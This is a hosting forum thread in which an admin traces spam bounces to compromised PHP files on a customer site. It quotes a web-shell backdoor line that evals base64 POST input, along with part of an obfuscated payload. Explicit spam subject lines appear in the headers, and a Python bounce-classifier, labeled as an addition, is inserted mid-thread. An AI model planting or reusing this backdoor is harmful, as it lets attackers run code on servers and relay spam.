Sending spam and no logs.

Discussion in 'Installation/Configuration' started by timontomi, Jan 12, 2015.

  1. timontomi

    timontomi New Member

    Hello,

    I have a problem with sending spam.
    Every day I receive info in the style "Undelivered Mail Returned to Sender".

    The "return" emails are from external mail servers. In the "return email" I receive an .eml file, where I can find info that the sender is e.g. [email protected], where "agnes_boyd" is not my username, but mydomain.com is my correct and actual domain.
    Code:
    Return-Path: <[email protected]>
    Received: from mydomain.com (hosting.mydomain.com [my.ip.address])
    by a2-selva6.bol.com.br (Postfix) with ESMTP id 3kLZbX1hP2zKLbDY
    for <[email protected]>; Mon, 12 Jan 2015 10:53:26 -0200 (BRST)
    Please help me, what can be wrong?
    In the log I don't see the emails being sent; I only receive non-delivery or bounce emails (after sending) from external mail servers.

    main.cf looks OK; below is part of main.cf
    Code:
    smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_non_fqdn_helo_hostname, reject_invalid_helo_hostname, reject_unknown_helo_hostname
    smtpd_delay_reject = yes
    smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination, reject_unknown_sender_domain, reject_non_fqdn_recipient, check_recipient_access mysql:/etc/postfix/mysql-virtual_recipient.cf, reject_unknown_recipient_domain, check_policy_service inet:127.0.0.1:10023, reject_rbl_client xbl.spamhaus.org, reject_rbl_client bl.spamcop.net
    smtpd_tls_security_level = may
    transport_maps = hash:/var/lib/mailman/data/transport-mailman, proxy:mysql:/etc/postfix/mysql-virtual_transports.cf
    relay_domains = mysql:/etc/postfix/mysql-virtual_relaydomains.cf
    relay_recipient_maps = mysql:/etc/postfix/mysql-virtual_relayrecipientmaps.cf
    proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks
    smtpd_client_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unknown_client_hostname, check_client_access mysql:/etc/postfix/mysql-virtual_client.cf, reject_rbl_client cbl.abuseat.org
    On ISPConfig I have a few domains, and only for one do I have these problems.
    From the other domains I have no emails in this style.
     
    Last edited: Jan 12, 2015
  2. timontomi

    timontomi New Member

  3. till

    till Super Moderator Staff Member ISPConfig Developer

  4. timontomi

    timontomi New Member

    But the undeliverable emails which I receive have a source like the one below, using my IP and my domain :/
    "lula_holmes" is another non-existent mailbox.

    Code:
    Received: from na01-bl2-obe.outbound.protection.outlook.com (207.46.163.207)
    by CIO-KRC-HT01.osuad.osu.edu (164.107.81.37) with Microsoft SMTP Server
    (TLS) id 14.3.174.1; Thu, 15 Jan 2015 00:23:16 -0500
    Received: from BY2FFO11FD027.protection.gbl (10.1.14.31) by
    BY2FFO11HUB036.protection.gbl (10.1.14.179) with Microsoft SMTP Server (TLS)
    id 15.1.49.13; Thu, 15 Jan 2015 05:23:14 +0000
    Received: from MYDOMAIN.COM (MY SRV IP) by
    BY2FFO11FD027.mail.protection.outlook.com (10.1.15.216) with Microsoft SMTP
    Server id 15.1.59.14 via Frontend Transport; Thu, 15 Jan 2015 05:23:13 +0000
    Date: Thu, 15 Jan 2015 06:23:11 +0100
    From: Lula Holmes <[email protected]>
    Reply-To: Lula Holmes <[email protected]>
    Message-ID: <[email protected]>
    To: <[email protected]>
    Subject: Fw:  Elena Grimaldi - Anal Threesome MMF
    
     
  5. cbj4074

    cbj4074 Member

    LOL, I love the subject at the bottom of the snippet.

    As Till said, nothing you have stated or provided so far indicates that these emails are in fact being sent from your server.

    Just because you receive an email message with "Undelivered Mail Returned to Sender", it does not mean that your server sent the original message. As Till suggested, it would be trivial to forge these messages.

    This is a common spamming technique known as "back-scatter". See: http://its.fsu.edu/Email/Spam-Virus-Email-Filtering/Spoofing-backscatter

    I recommend that you implement appropriate spam-filtering mechanisms on the server in question, namely, clamav, Amavis, and SpamAssassin. And, ideally, postgrey and SPF-checking.
     
  6. timontomi

    timontomi New Member

    Hi,

    Thanks for answers.

    I have already implemented amavis and postgrey on the server and the messages still come.

    So is it normal then that my server is sometimes on a blacklist because of these spam messages, about once per month?
     
  7. cbj4074

    cbj4074 Member

    And what about SpamAssassin and SPF-checking?

    Also, your server shouldn't be blacklisted because of this. You are receiving these bogus emails, not sending them. Correct?
     
  8. timontomi

    timontomi New Member

    Correct, because I don't see these emails in the mail log. If I send an email from my account -> I see it in the mail log.
    SpamAssassin -> incoming emails have ***SPAM*** in the headers or are bounced.

    Today i received email:
    Code:
    Received-SPF: Fail (protection.outlook.com: domain of MYDOMAIN does
    not designate 207.46.163.185 as permitted sender)
    So SPF checking works.

    But for some emails i have:
    Code:
    Received: from BLUPR08CA0042.namprd08.prod.outlook.com (10.141.200.22) by
    BL2PR08MB065.namprd08.prod.outlook.com (10.242.196.12) with Microsoft SMTP
    Server (TLS) id 15.1.59.20; Mon, 19 Jan 2015 12:50:49 +0000
    Received: from BY2FFO11FD004.protection.gbl (2a01:111:f400:7c0c::156) by
    BLUPR08CA0042.outlook.office365.com (2a01:111:e400:88d::22) with Microsoft
    SMTP Server (TLS) id 15.1.59.20 via Frontend Transport; Mon, 19 Jan 2015
    12:50:49 +0000
    Received: from MYDOMAIN (MY IP) by
    BY2FFO11FD004.mail.protection.outlook.com (10.1.14.158) with Microsoft SMTP
    Server id 15.1.75.11 via Frontend Transport; Mon, 19 Jan 2015 12:50:48 +0000
    Date: Mon, 19 Jan 2015 13:50:47 +0100
    From: Stacie Mcbride <[email protected]>
    Reply-To: "Stacie Mcbride" <[email protected]>
    Message-ID: <[email protected]>
    To: <[email protected]>
    Subject: FW: Hi, A daily updated list showing a variety of free blowjob picture and
    movie galleries
    X-Priority: 3 (Normal)
    MIME-Version: 1.0
    Content-Type: text/html; charset="iso-8859-1"
    Content-Transfer-Encoding: 8bit
    Return-Path: [email protected]
    X-EOPAttributedMessage: 0
    Received-SPF: Pass (protection.outlook.com: domain of MYDOMAIN
    designates MY IP as permitted sender)
    receiver=protection.outlook.com; client-ip=MY IP;
    helo=MY DOMAIN;
    Authentication-Results: spf=pass (sender IP is MY IP)
    [email protected] DOMAIN; und.nodak.edu; dkim=none
    (message not signed) header.d=none;und.nodak.edu; dmarc=permerror action=none
    header.from=MY DOMAIN;
    So it looks like these emails can be from my server but are not in the logs? :/
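The distinction drawn in this thread between a forged bounce (backscatter, SPF fail, foreign client IP) and a bounce for mail that really left the server (SPF pass from your own IP) can be automated over the bounce's headers. This is an added example, not code from the thread or from ISPConfig; the header samples are constructed to mirror the two quoted cases, with documentation-range IPs and example.com in place of the poster's redacted values.

```python
import re

# Constructed sample bounce headers modelled on the two cases quoted in this
# thread; real domains and IPs replaced with documentation values.
FORGED = """\
Received: from example.com (203.0.113.77) by
 mail.example.edu (198.51.100.5) with SMTP; Thu, 15 Jan 2015 05:23:13 +0000
Received-SPF: Fail (mail.example.edu: domain of example.com does
 not designate 203.0.113.77 as permitted sender)
"""
LOCAL = """\
Received: from example.com (192.0.2.10) by
 mail.example.edu (198.51.100.5) with SMTP; Mon, 19 Jan 2015 12:50:48 +0000
Received-SPF: Pass (mail.example.edu: domain of example.com
 designates 192.0.2.10 as permitted sender)
"""
HOP_RE = re.compile(r'^Received:\s*from\s+(\S+)\s*\(([^)]*)\)', re.I)
IP_RE = re.compile(r'\b(\d{1,3}(?:\.\d{1,3}){3})\b')

def unfold(raw):
    # Join RFC 5322 folded continuation lines so each header is one line.
    return re.sub(r'\r?\n[ \t]+', ' ', raw).splitlines()

def originating_hop(lines, my_domain):
    """Hop where a foreign MTA accepted the message from a client announcing
    itself as our domain; returns (helo_name, client_ip)."""
    for line in lines:
        m = HOP_RE.match(line)
        if m and re.fullmatch(r'(.*\.)?' + re.escape(my_domain), m.group(1), re.I):
            ip = IP_RE.search(m.group(2))
            return m.group(1), ip.group(1) if ip else None
    return None, None

def spf_result(lines):
    for line in lines:
        if line.lower().startswith('received-spf:'):
            return line.split(':', 1)[1].split()[0].lower()
    return None

def classify_bounce(raw_headers, my_domain, my_ips):
    # Did the bounced message really leave one of our IPs, or is it backscatter?
    lines = unfold(raw_headers)
    helo, ip = originating_hop(lines, my_domain.lower())
    spf = spf_result(lines)
    if ip in my_ips and spf == 'pass':
        verdict = 'sent-from-our-ip'   # hunt for a compromised script locally
    elif ip is None or ip not in my_ips:
        verdict = 'forged-elsewhere'   # backscatter: not our outbound mail
    else:
        verdict = 'inconclusive'       # our IP but SPF not a clean pass
    return {'spf': spf, 'claimed_helo': helo, 'client_ip': ip, 'verdict': verdict}
```

Feed it the raw headers of each returned .eml together with your server's public IPs; only the 'sent-from-our-ip' verdict points at something on the server itself.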
     
  9. cbj4074

    cbj4074 Member

    Okay, good to see that SpamAssassin flags the forged bounce messages as spam, and that SPF-checking seems to work.

    Given the rest of what you said, perhaps you have a compromised PHP script or similar that is allowing somebody to send mail from your server. I see this problem with compromised WordPress installations all the time.

    If a PHP script is responsible for sending the mail, it is possible that you will not have much (if any) evidence in your Postfix logs.

    Two things I would do immediately:

    1.) Modify your PHP configuration such that all mail activity is logged.

    2.) Modify your PHP configuration such that the user under which the PHP process is running when mail is sent is included in the message headers.

    If these messages really are being sent from your server, these two measures will help immensely in tracking down the source.

    While I have not implemented it myself, this subject is discussed at length in https://www.howtoforge.com/how-to-log-emails-sent-with-phps-mail-function-to-detect-form-spam , which is probably worth a read.

    Curious to see what you find...
     
  10. timontomi

    timontomi New Member

  11. till

    till Super Moderator Staff Member ISPConfig Developer

    That's correct, but in your case it just complicates the problem: if the spammers would use the mail functions, you would be able to identify the spam in mail.log and also see the sending script in the mail headers. But when the function is disabled, the spammers have to upload their own SMTP library to send mail, and that's not easy to detect, as you won't get any logs in that case and even the log script won't show anything.

    What you can try is to find the sending script with lsof, but this will only give useful results when you catch it while it is currently sending.
     
  12. timontomi

    timontomi New Member

    Unfortunately, nothing in the logs via the mail function :/ (a test email via test.php was in the log, so logging works correctly).
    But I think I solved the problem.
    I checked customers' websites and in one log I found some errors in PHP sites.
    Deeper -> I found, in the .php file which generated the error lines:

    Code:
    eval(base64_decode($_POST['e']));
    Code:
    return base64_decode($vNS0QU3);}
    $v0O2K6T = '60dVYaTfKb3mXvSkdv2lKz1ETRCgR1ikPZPRh5fUO8qV9IhGLDoq9EqV9IqbYRxmwanYwDxZK'.
    'MPIwr5Vgt9EdtZuYOnYwDxZKMPI0E9ETt3AXag8tPn8dvCfdvn8tRx2wrxj'.
    'D8xVT03uXEi8dt3f34FkT0S4XvFfYa3fKMfCXzfQTRVZKMPIYRZjDb5YDM3ndt3Iw133P1xVJquVwaiAdMpmdExZh5Ahh12gOA9h'.
    'wr5VL4hjD8xVKaP8Xzf4wDFrhZpzwr5VwfpEtzo8equVwaiAdMpmdExZTz2kTzP8W0KVURxqequVwaiAdM'.
    'pmdExZFzP8W0W7WtFqWtgVwDxVwr5V9vP46zcbequVwaiAdMpmdExZTz2kWMPEKDx2wzTCXa3f'.
    'equVwaiAdMpmdExZPzflT02AWDxVwDxVwDxVwr5VLOhjD8xVKaP8Xzf4wDFh60AfXzfl6tgVwDxVwDxVURx'.
    'ILrnYwDiqW09n60LV91TfKb3mXvoVwDxVwDxVwDx2wDKAs4wG38KjD8xVKa'.
    '97WzP4WzPZwDFIXtFqtv37XMojD8xVKa97WzP4WzPZwDFfKb97K4'.
    'nYwDiqKM25T035T0gV9zCfXz2kKbinJOnYwDiqKM25T035T0gVTbPGdHFmXvoVT0FfdbPbYDFIWawm'.
    'wanYwDxVwa3H6tF46Dxu9aFu6tLlUZFfdbPbXHP5KaP5YRijD8xVwDxVwz3CKvhV9vPEKM2Etvp7TE'.
    etc. etc. etc., with 1510 lines.

    I deleted these .php files and the problem with spam is gone.
    Since yesterday, no "undeliverable" emails :)
     